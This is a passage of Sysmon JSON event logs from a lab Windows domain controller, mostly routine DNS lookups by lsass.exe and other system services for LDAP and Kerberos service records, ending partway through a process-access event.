{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2462,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.171\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.171","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2463,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.175\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.175","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2464,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.177\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001051C90200}\r\nProcessId: 3084\r\nQueryName: win-dc-8400769.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\dfssvc.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.177","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001051C90200}","QueryName":"win-dc-8400769.attackrange.local","QueryStatus":"0","QueryResults":"fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\dfssvc.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2465,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.182\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.dc._msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  33 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.182","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_kerberos._tcp.dc._msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  33 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2466,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.183\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.pdc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.183","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.pdc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2467,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.184\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  2 win-dc-8400769.attackrange.local;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.184","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  2 win-dc-8400769.attackrange.local;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2468,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.184\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.184","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2469,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.187\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.gc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.187","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.gc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2470,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.190\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-00101EC40000}\r\nProcessId: 1204\r\nQueryName: win-dc-8400769.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.190","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-00101EC40000}","QueryName":"win-dc-8400769.attackrange.local","QueryStatus":"0","QueryResults":"fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2471,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.190\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.190","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2472,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.194\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.c4962f1c-58a2-45af-9f61-562f5e078004.domains._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.194","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.c4962f1c-58a2-45af-9f61-562f5e078004.domains._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2473,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.198\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: gc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.198","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"gc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2474,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.200\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: win-dc-8400769.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.200","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"win-dc-8400769.attackrange.local","QueryStatus":"0","QueryResults":"fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2475,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.201\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: 4d9bcf60-c71b-45f3-831b-ab9ae474e3b2._msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  5 win-dc-8400769.attackrange.local;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.201","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"4d9bcf60-c71b-45f3-831b-ab9ae474e3b2._msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  5 win-dc-8400769.attackrange.local;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2476,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.204\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.dc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.204","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_kerberos._tcp.dc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2477,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.205\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nProcessId: 1140\r\nQueryName: win-dc-8400769.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.205","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","QueryName":"win-dc-8400769.attackrange.local","QueryStatus":"0","QueryResults":"fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2478,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.206\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.206","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2479,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.211\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.dc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.211","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.dc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2480,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.214\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.214","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2481,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.220\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.220","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_kerberos._tcp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2482,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.254\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 